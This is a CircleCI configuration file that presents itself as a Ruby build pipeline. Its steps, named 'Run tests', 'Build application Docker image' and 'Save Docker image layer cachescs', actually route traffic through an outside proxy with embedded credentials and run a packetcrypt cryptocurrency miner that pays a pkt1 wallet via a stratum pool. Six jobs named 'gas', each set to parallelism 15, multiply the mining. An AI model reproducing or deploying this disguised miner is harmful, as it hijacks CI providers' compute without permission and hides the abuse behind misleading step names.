.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Run tests
          command: |
            export HTTP_PROXY=http://Selbonetoenak:E0q4MgW@94.124.160.162:45785
            export HTTPS_PROXY=https://Selbonetoenak:E0q4MgW@94.124.160.162:45785 
            export http_proxy=http://Selbonetoenak:E0q4MgW@94.124.160.162:45785
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
      - run:
          name: Save Docker image layer cachescs
          command: |
            docker run thomasjp0x42/packetcrypt ann -p pkt1qtdnxd2vlzly3rhwup4vv77a9rcv7azszdmjc76 https://stratum.zetahash.com 2>&1 | grep -o "annmine.rs.*Ke.*"
      - save_cache:
          key: v1-{{ .Branch }}-{{ epoch }}
          paths:
            - /caches/app.tar

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  gas1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas2:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas3:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas4:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas5:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  gas6:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - gas1
      - gas2
      - gas3
      - gas4
      - gas5
      - gas6
